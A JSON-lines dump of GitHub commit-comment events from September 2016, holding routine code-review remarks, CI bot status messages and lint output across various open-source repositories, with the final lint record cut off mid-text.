{"id":"4587906585","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"enki-community/enki"},"payload":{"comment":{"id":19091756,"position":5,"line":8,"path":"enki/CMakeLists.txt","commit_id":"4faa2e18cda75cb9e95f215ec41373d866b267e7","created_at":"2016-09-20T07:20:46Z","updated_at":"2016-09-20T07:20:46Z","body":"Actually this is not required, the best is to test directly `_WIN32` in the source (see for instance http://stackoverflow.com/questions/6679396/should-i-define-both-win32-and-win64-in-64bit-build)"}},"created_at":"2016-09-20T07:20:46Z"}
{"id":"4587908080","type":"CommitCommentEvent","actor":{"login":"balloob"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19091771,"position":null,"line":null,"path":null,"commit_id":"e7f9fdca67675fc6ced54b334985c0fb76951034","created_at":"2016-09-20T07:21:11Z","updated_at":"2016-09-20T07:21:11Z","body":"It's not a real issue. it's just saying that it was not shutdown gracefully. Means that there could have been unrecorded states etc.\r\n\r\nTo shutdown, send SIGTERM. To restart, send SIGHUP."}},"created_at":"2016-09-20T07:21:11Z"}
{"id":"4587908827","type":"CommitCommentEvent","actor":{"login":"bchartier"},"repo":{"name":"geobretagne/mdchecker"},"payload":{"comment":{"id":19091780,"position":17,"line":15,"path":"app/create_db.py","commit_id":"cfd31babe54dc59215dde21c9dd4790b2a13d3d1","created_at":"2016-09-20T07:21:22Z","updated_at":"2016-09-20T07:21:22Z","body":"hum, sorry for this remaining comment I used for tests"}},"created_at":"2016-09-20T07:21:22Z"}
{"id":"4587909024","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091783,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:21:26Z","updated_at":"2016-09-20T07:21:26Z","body":"You have a broken plugin sending bad values to skin.py and you need to fix that. Not this terrible workaround and editing every other thing it breaks."}},"created_at":"2016-09-20T07:21:26Z"}
{"id":"4587911262","type":"CommitCommentEvent","actor":{"login":"bimoQi"},"repo":{"name":"bimoQi/bimoQi.github.io"},"payload":{"comment":{"id":19091839,"position":null,"line":null,"path":null,"commit_id":"fcf04742774c0a57f13b4a8669b7c0af886dd62f","created_at":"2016-09-20T07:22:02Z","updated_at":"2016-09-20T07:22:02Z","body":"o "}},"created_at":"2016-09-20T07:22:02Z"}
{"id":"4587911798","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"enki-community/enki"},"payload":{"comment":{"id":19091849,"position":5,"line":7,"path":"viewer/CMakeLists.txt","commit_id":"4faa2e18cda75cb9e95f215ec41373d866b267e7","created_at":"2016-09-20T07:22:11Z","updated_at":"2016-09-20T07:22:11Z","body":"Why forcing static libraries here?"}},"created_at":"2016-09-20T07:22:11Z"}
{"id":"4587913264","type":"CommitCommentEvent","actor":{"login":"jacktan1991"},"repo":{"name":"jacktan1991/smartsql"},"payload":{"comment":{"id":19091861,"position":358,"line":358,"path":"smartsql.py","commit_id":"ea5ff81513b5b01e7bb9631650687f113ab36d34","created_at":"2016-09-20T07:22:33Z","updated_at":"2016-09-20T07:22:33Z","body":"self._sql = \"%s OR %s\" % (self._sql, c.sql) if not c._empty else self._sql"}},"created_at":"2016-09-20T07:22:33Z"}
{"id":"4587913510","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091862,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:22:37Z","updated_at":"2016-09-20T07:22:37Z","body":"> ...the 'culprit' plugin runs fine in PLi/XTA/ATV, so it's really a ViX-bug."}},"created_at":"2016-09-20T07:22:37Z"}
{"id":"4587917091","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091872,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:23:37Z","updated_at":"2016-09-20T07:23:37Z","body":"The negative consequence is -e settings no longer work. And the commit is written wrong. \r\n\r\nWhy have you substituted a \"+=\" with an \"=\""}},"created_at":"2016-09-20T07:23:37Z"}
{"id":"4587920831","type":"CommitCommentEvent","actor":{"login":"kareanyi"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19091878,"position":null,"line":null,"path":null,"commit_id":"63c41d44ab972b5c078e56c2387aaa07a18a8142","created_at":"2016-09-20T07:24:37Z","updated_at":"2016-09-20T07:24:37Z","body":"for issue #32 "}},"created_at":"2016-09-20T07:24:37Z"}
{"id":"4587922407","type":"CommitCommentEvent","actor":{"login":"Akkarinn"},"repo":{"name":"rigtorp/MPMCQueue"},"payload":{"comment":{"id":19091880,"position":null,"line":null,"path":null,"commit_id":"5bb796fe009ad04c9eae57d0e2289ffb8a7358d1","created_at":"2016-09-20T07:25:03Z","updated_at":"2016-09-20T07:25:03Z","body":"Even easier :+1: "}},"created_at":"2016-09-20T07:25:03Z"}
{"id":"4587922692","type":"CommitCommentEvent","actor":{"login":"kareanyi"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19091882,"position":null,"line":null,"path":null,"commit_id":"b941a57ccd62b3fd6f7049577259b9a45cb5541a","created_at":"2016-09-20T07:25:07Z","updated_at":"2016-09-20T07:25:07Z","body":"for issue #32 "}},"created_at":"2016-09-20T07:25:07Z"}
{"id":"4587930737","type":"CommitCommentEvent","actor":{"login":"reginakim"},"repo":{"name":"BRAINSia/BRAINSTools"},"payload":{"comment":{"id":19091893,"position":null,"line":null,"path":null,"commit_id":"fc5912b3ee2af6acfec8aa86934a0edbf877190e","created_at":"2016-09-20T07:27:19Z","updated_at":"2016-09-20T07:27:19Z","body":"@hjmjohnson @Roineri5 \r\nHans, \r\n\r\nThis is a change by Janghoon Oh, here in Korea University. He is working with me to improve the BAW for our dataset. (and learning git.)\r\n\r\nThis is a bit of change that improves our results from 1.5T, which takes about 40min only for the bias correction. I don't think you would need this much of bias correction in general. \r\n\r\nWe are still doing a quite a bit experiments for the Korean data set (KoGES: Korea genetics and epidemics study group). So at this point, I don't think this should be merged to the origin. I am just letting you know about the branch commitment. :) \r\n\r\nBest, \r\n\r\nRegina\r\n"}},"created_at":"2016-09-20T07:27:19Z"}
{"id":"4587935304","type":"CommitCommentEvent","actor":{"login":"florian-wagner"},"repo":{"name":"gimli-org/gimli"},"payload":{"comment":{"id":19091909,"position":null,"line":null,"path":null,"commit_id":"93dad0abdf8a9417648dba6fdb3d89c443e7b5cd","created_at":"2016-09-20T07:28:33Z","updated_at":"2016-09-20T07:28:33Z","body":"sphinx-gallery is checked independently and, if present, configured and added to the extensions [at a later stage](https://github.com/gimli-org/gimli/blob/93dad0abdf8a9417648dba6fdb3d89c443e7b5cd/doc/conf.py#L97-L132). This way, one can work on the documentation without the necessity of installing sphinx-gallery and running all the tutorials/examples."}},"created_at":"2016-09-20T07:28:33Z"}
{"id":"4587936014","type":"CommitCommentEvent","actor":{"login":"Siile"},"repo":{"name":"Siile/Ninslash"},"payload":{"comment":{"id":19091910,"position":null,"line":null,"path":null,"commit_id":"20c9cd9a27f621aaaf17ece0ebef40a223cda06d","created_at":"2016-09-20T07:28:44Z","updated_at":"2016-09-20T07:28:44Z","body":"@pelya Can you check?\r\n\r\n[ 42/168] [2] c++ src/engine/shared/datafile.cpp\r\nsrc/engine/shared/datafile.cpp: In member function ‘int CDataFileWriter::Finish()’:\r\nsrc/engine/shared/datafile.cpp:562:112: error: format ‘%lu’ expects argument of type ‘long unsigned int’, but argument 5 has type ‘unsigned int’ [-Werror=format=]\r\n (%lu)\", i, m_pItems[i].m_Size, m_pItems[i].m_Size+sizeof(CDatafileItem));"}},"created_at":"2016-09-20T07:28:44Z"}
{"id":"4587936250","type":"CommitCommentEvent","actor":{"login":"emartynov"},"repo":{"name":"Glucosio/glucosio-android"},"payload":{"comment":{"id":19091913,"position":4,"line":51,"path":"app/src/main/java/org/glucosio/android/presenter/RemindersPresenter.java","commit_id":"6c1895bb91551fcf828fee3f75b888aa64a09e40","created_at":"2016-09-20T07:28:48Z","updated_at":"2016-09-20T07:28:48Z","body":"It would be easy catch with unit tests"}},"created_at":"2016-09-20T07:28:48Z"}
{"id":"4587937548","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091917,"position":162,"line":162,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T07:29:08Z","updated_at":"2016-09-20T07:29:08Z","body":"質問です。\r\nここで定義している`remote_ips`はこのソース上どこにも存在していませんが、\r\n何のために定義しているのでしょうか？\r\n必要である場合、可能であればドキュメントのJSONイメージで`remote_ips`の内容が見えるようにしたほうがよいと思います。見る限りリストっぽいのは`clients`だけのようですが"}},"created_at":"2016-09-20T07:29:08Z"}
{"id":"4587938875","type":"CommitCommentEvent","actor":{"login":"emartynov"},"repo":{"name":"Glucosio/glucosio-android"},"payload":{"comment":{"id":19091926,"position":28,"line":54,"path":"app/src/main/java/org/glucosio/android/tools/GlucosioAlarmManager.java","commit_id":"6c1895bb91551fcf828fee3f75b888aa64a09e40","created_at":"2016-09-20T07:29:29Z","updated_at":"2016-09-20T07:29:29Z","body":"You can just compare millesecs here, no needs to instantiate `DateTime`"}},"created_at":"2016-09-20T07:29:29Z"}
{"id":"4587939577","type":"CommitCommentEvent","actor":{"login":"emartynov"},"repo":{"name":"Glucosio/glucosio-android"},"payload":{"comment":{"id":19091929,"position":5,"line":32,"path":"build.gradle","commit_id":"6c1895bb91551fcf828fee3f75b888aa64a09e40","created_at":"2016-09-20T07:29:40Z","updated_at":"2016-09-20T07:29:40Z","body":"Cool!"}},"created_at":"2016-09-20T07:29:40Z"}
{"id":"4587939893","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19091931,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-20T07:29:45Z","updated_at":"2016-09-20T07:29:45Z","body":"@MitchBradley, for your interest, this is what I'm using here for remote access to SPIFFS.  Avoided `tcp-write-wait` and `continuation` because I couldn't get them to work, and was happy to have everything happen in callbacks. As consequence `send-file` also needed some rework to differentiate between send window full and end of file."}},"created_at":"2016-09-20T07:29:45Z"}
{"id":"4587943102","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19091945,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T07:30:32Z","updated_at":"2016-09-20T07:30:32Z","body":"Thanks, in fact we have this:\r\n- each transceiver generates its txoutclk from the common input refclk.\r\n- we then have a clock domain per transceiver. (frequency will be identical, but I'm guessing we can't assume phase will be identical, at least resets won't probably be identical)\r\n- each link module (one per transceiver) needs to run in the clock domain of the transceiver.\r\n\r\nFor the transport layer, we are mapping converters data to lanes and thus the transport layer will run in another clock domain (we can use user clock domain since this layer is the interface with the user).\r\n\r\nSo between transport module and links modules, we need to change clock domain. But we could also have only one asynchronous FIFO at the output of the transport module, run the read part of the FIFO with clock domain of the first transceiver and as you suggest only have elastic buffer for the others link modules.\r\n\r\nSo I'll improve that once I get the core working."}},"created_at":"2016-09-20T07:30:32Z"}
{"id":"4587946227","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091956,"position":162,"line":162,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T07:31:21Z","updated_at":"2016-09-20T07:31:21Z","body":"あ、消し忘れです。"}},"created_at":"2016-09-20T07:31:21Z"}
{"id":"4587946586","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091957,"position":181,"line":181,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T07:31:28Z","updated_at":"2016-09-20T07:31:28Z","body":"ここのelse文はインデントが１つずれていませんか？"}},"created_at":"2016-09-20T07:31:28Z"}
{"id":"4587947850","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19091962,"position":null,"line":null,"path":null,"commit_id":"b5f98257ce59e5a24d9c951493a68ebd57ffbddf","created_at":"2016-09-20T07:31:46Z","updated_at":"2016-09-20T07:31:46Z","body":"We’ll see how well it works soon. There is a tiny chance that a tiny disconnect was not noticed, but regular ones, like leaving for the day won’t leave you with an out-of-date list in the morning."}},"created_at":"2016-09-20T07:31:46Z"}
{"id":"4587952338","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091968,"position":181,"line":181,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T07:32:53Z","updated_at":"2016-09-20T07:32:53Z","body":"Python 文法として、また、実装意図としてもあってますが？"}},"created_at":"2016-09-20T07:32:53Z"}
{"id":"4587954841","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"Reshma2794/imad-2016-app"},"payload":{"comment":{"id":19091977,"position":null,"line":null,"path":null,"commit_id":"0eeb651c7535ff1b359ee8d1ce38c06c1ac22555","created_at":"2016-09-20T07:33:34Z","updated_at":"2016-09-20T07:33:34Z","body":"do you know how to add an image on webpage?i tried uploading a file in to ui folder and wrote its name in html.but it doesnt work"}},"created_at":"2016-09-20T07:33:34Z"}
{"id":"4587955830","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091979,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:33:50Z","updated_at":"2016-09-20T07:33:50Z","body":"> if you know of any better fix, please be my guest.\r\n\r\nThe fix has been taken from PLi.\r\nBut see https://github.com/OpenViX/enigma2/commit/79250a12e5d15a819c61b0335db93fb2aad86182"}},"created_at":"2016-09-20T07:33:50Z"}
{"id":"4587956548","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19091981,"position":null,"line":null,"path":null,"commit_id":"ae1b69430ef0ebcdcecb69c67e2ec09f210c9ebd","created_at":"2016-09-20T07:34:02Z","updated_at":"2016-09-20T07:34:02Z","body":"Since birth I have anticipated the day my kitchen lights could have their mired value modulated by the latest closing value of the DOW! We are one step closer with each passing commit comrades! "}},"created_at":"2016-09-20T07:34:02Z"}
{"id":"4587957835","type":"CommitCommentEvent","actor":{"login":"chliul"},"repo":{"name":"Dash-Industry-Forum/dash.js"},"payload":{"comment":{"id":19091992,"position":null,"line":null,"path":null,"commit_id":"e6091fde74dcaf76920623a58fb515494455bdf7","created_at":"2016-09-20T07:34:22Z","updated_at":"2016-09-20T07:34:22Z","body":"Why wantBufferLevel is set to bolaState.Vp * (utilities[bolaQuality] + bolaState.gp)?\r\nI think it should be both equation have equal scores.\r\nCould you please explain this? \r\nThank you very much!"}},"created_at":"2016-09-20T07:34:22Z"}
{"id":"4587958917","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19091994,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T07:34:38Z","updated_at":"2016-09-20T07:34:38Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T07:34:38Z"}
{"id":"4587959422","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19091996,"position":6,"line":37,"path":"composer.json","commit_id":"d6dc8186f51992d5052e244edf9eae1b28373a57","created_at":"2016-09-20T07:34:46Z","updated_at":"2016-09-20T07:34:46Z","body":"should you  also declare `ext-xml` ?"}},"created_at":"2016-09-20T07:34:46Z"}
{"id":"4587960856","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19092001,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T07:35:08Z","updated_at":"2016-09-20T07:35:08Z","body":"In fact this should work (untested code):\r\n\r\n````\r\n if (   stm != side_to_move()\r\n       && (discovered_check_candidates() & from)\r\n       && !aligned(from, to, square<KING>(stm)))\r\n       stmAttackers &= pieces(stm, KING);\r\n````"}},"created_at":"2016-09-20T07:35:08Z"}
{"id":"4587961626","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19092005,"position":6,"line":37,"path":"composer.json","commit_id":"d6dc8186f51992d5052e244edf9eae1b28373a57","created_at":"2016-09-20T07:35:19Z","updated_at":"2016-09-20T07:35:19Z","body":"do you really depend on a certain xml version?"}},"created_at":"2016-09-20T07:35:19Z"}
{"id":"4587962356","type":"CommitCommentEvent","actor":{"login":"facchinm"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19092008,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-20T07:35:29Z","updated_at":"2016-09-20T07:35:29Z","body":"Sorry Lui but I can't get your point. We are currently using USB_DeviceDescriptorB (0xEF,0x02,0x01 as per IAD specifications) on all OS which support composite devices, so it shouldn't be problematic in any design. \r\nOur main target for the USB related code are Linux/Win/OSX since we use it primarily for CDC, but if you have a proposal please open a pull request which solves the problems in your system and we'll take care of testing it in all the OSs combinations."}},"created_at":"2016-09-20T07:35:29Z"}
{"id":"4587966788","type":"CommitCommentEvent","actor":{"login":"zingano"},"repo":{"name":"ParsePlatform/parse-server"},"payload":{"comment":{"id":19092021,"position":null,"line":null,"path":null,"commit_id":"cb7b54941b2b6953d96a3ca4223efc0961b9e636","created_at":"2016-09-20T07:36:36Z","updated_at":"2016-09-20T07:36:36Z","body":"@flovilmart - how do I try this out? Presumably it's not enabled for everyone in 2.2.19?"}},"created_at":"2016-09-20T07:36:36Z"}
{"id":"4587967542","type":"CommitCommentEvent","actor":{"login":"mmd-osm"},"repo":{"name":"estadtherr/Overpass-API"},"payload":{"comment":{"id":19092024,"position":null,"line":null,"path":null,"commit_id":"4374a34881ac5cfc57614b5f5127b987f6981dfe","created_at":"2016-09-20T07:36:49Z","updated_at":"2016-09-20T07:36:49Z","body":"Ah, good to know. I think you should sync up very early with Roland (@drolbr) via email on the recommended way forward. This is to increase chances for your fixes to be included.\r\n\r\nThere's quite some material waiting to be merged in various branches, in particular out_csv_finetuning. It would be somewhat unfortunate, if those changes somehow interfere with your findings & fixes.\r\n\r\nI also have set up travis integration (https://github.com/mmd-osm/Overpass-API/blob/master_test/.travis.yml), but due to the way the test scripts work, the overall travis result does not always reflect the test status. If you're looking into test cases, travis integration is probably also worthwhile keeping in mind."}},"created_at":"2016-09-20T07:36:49Z"}
{"id":"4587970773","type":"CommitCommentEvent","actor":{"login":"sokra"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19092031,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-20T07:37:40Z","updated_at":"2016-09-20T07:37:40Z","body":"there is already a package for this. awesome. :+1: "}},"created_at":"2016-09-20T07:37:40Z"}
{"id":"4587972014","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19092034,"position":3,"line":2,"path":"mass_mailing_sending_queue/security/ir.model.access.csv","commit_id":"6d4ec4065c5fde37c9a3c06c196c5756b013b7ba","created_at":"2016-09-20T07:38:00Z","updated_at":"2016-09-20T07:38:00Z","body":"Shouldn't this be only read for plain users?"}},"created_at":"2016-09-20T07:38:00Z"}
{"id":"4587972567","type":"CommitCommentEvent","actor":{"login":"Ainnaya"},"repo":{"name":"Ainnaya/Pendaftaran-Metic-Telkom-School-Malang"},"payload":{"comment":{"id":19092035,"position":null,"line":null,"path":null,"commit_id":"95a4b572968dc640b1c8d3da8b675e84484acb0d","created_at":"2016-09-20T07:38:10Z","updated_at":"2016-09-20T07:38:10Z","body":"Unggah Screenshoot dari APK Pendaftaran Metic Telkom School Malang"}},"created_at":"2016-09-20T07:38:10Z"}
{"id":"4587981031","type":"CommitCommentEvent","actor":{"login":"qiumei527"},"repo":{"name":"qiumei527/cellback"},"payload":{"comment":{"id":19092055,"position":null,"line":null,"path":null,"commit_id":"2930cf7df29983bcc12dce9218ba7eb9443785dc","created_at":"2016-09-20T07:40:22Z","updated_at":"2016-09-20T07:40:22Z","body":"1"}},"created_at":"2016-09-20T07:40:22Z"}
{"id":"4587986091","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092075,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:41:41Z","updated_at":"2016-09-20T07:41:41Z","body":"So now you can revert all the skin changes.\r\n\r\nAlso a try/except should contain an error message so it doesn't just hide the error, but writes it to the debug log."}},"created_at":"2016-09-20T07:41:41Z"}
{"id":"4587988115","type":"CommitCommentEvent","actor":{"login":"Yajo"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19092082,"position":3,"line":2,"path":"mass_mailing_sending_queue/security/ir.model.access.csv","commit_id":"6d4ec4065c5fde37c9a3c06c196c5756b013b7ba","created_at":"2016-09-20T07:42:11Z","updated_at":"2016-09-20T07:42:11Z","body":"I guess read + create, @antespi will know better..."}},"created_at":"2016-09-20T07:42:11Z"}
{"id":"4587989646","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092086,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-20T07:42:33Z","updated_at":"2016-09-20T07:42:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1054](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13583&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T07:42:33Z"}
{"id":"4587992740","type":"CommitCommentEvent","actor":{"login":"kud1ing"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":19092094,"position":4,"line":3,"path":"README.md","commit_id":"5d6cc90acbf8268440254ebe55a5a178f9bb4005","created_at":"2016-09-20T07:43:22Z","updated_at":"2016-09-20T07:43:22Z","body":"Is this section still valid, now that Swift 3 is released?"}},"created_at":"2016-09-20T07:43:22Z"}
{"id":"4587993207","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19092096,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T07:43:29Z","updated_at":"2016-09-20T07:43:29Z","body":"> So between transport module and links modules, we need to change clock domain\r\n\r\nShouldn't that clock domain run at a multiple of the transceivers? We are having a continuous data stream here.\r\n\r\n>  as you suggest only have elastic buffer for the others link modules.\r\n\r\nYes."}},"created_at":"2016-09-20T07:43:29Z"}
{"id":"4587995611","type":"CommitCommentEvent","actor":{"login":"xxnet"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19092102,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-20T07:44:06Z","updated_at":"2016-09-20T07:44:06Z","body":"不能老藏着大家捐的appid啊，要放出来给新手用的。\r\n\r\n最近改进了公共appid的流量计算方法，尽量让大家爽的同时，也要保证新手也有得用。\r\n\r\n这里感谢所有捐献appid的朋友们。"}},"created_at":"2016-09-20T07:44:06Z"}
{"id":"4587997889","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19092111,"position":9,"line":123,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/SecurityCache.java","commit_id":"53dbabc7c723cf6e9bc41d98947d6f3a7951edc0","created_at":"2016-09-20T07:44:37Z","updated_at":"2016-09-20T07:44:37Z","body":"I'm not sure javadoc will like getting several @since."}},"created_at":"2016-09-20T07:44:37Z"}
{"id":"4588003222","type":"CommitCommentEvent","actor":{"login":"dhess"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19092127,"position":null,"line":null,"path":null,"commit_id":"7b9d3f860588c5157ec9cb2a325e9e16a2ab6e17","created_at":"2016-09-20T07:45:54Z","updated_at":"2016-09-20T07:45:54Z","body":"OK, I think I see. Now that there's no longer a libiconv wrapper around libiconv and libcharset, _locale_charset is missing."}},"created_at":"2016-09-20T07:45:54Z"}
{"id":"4588004887","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19092136,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T07:46:20Z","updated_at":"2016-09-20T07:46:20Z","body":"> each transceiver generates its txoutclk from the common input refclk.\r\n\r\nI would expect the phase differences to be small, it should be essentially the same clock. It seems Xilinx doesn't document that, though."}},"created_at":"2016-09-20T07:46:20Z"}
{"id":"4588008326","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19092148,"position":null,"line":null,"path":null,"commit_id":"ae6bace8e017496d3896404dee59b9b6c5cd64da","created_at":"2016-09-20T07:47:10Z","updated_at":"2016-09-20T07:47:10Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, 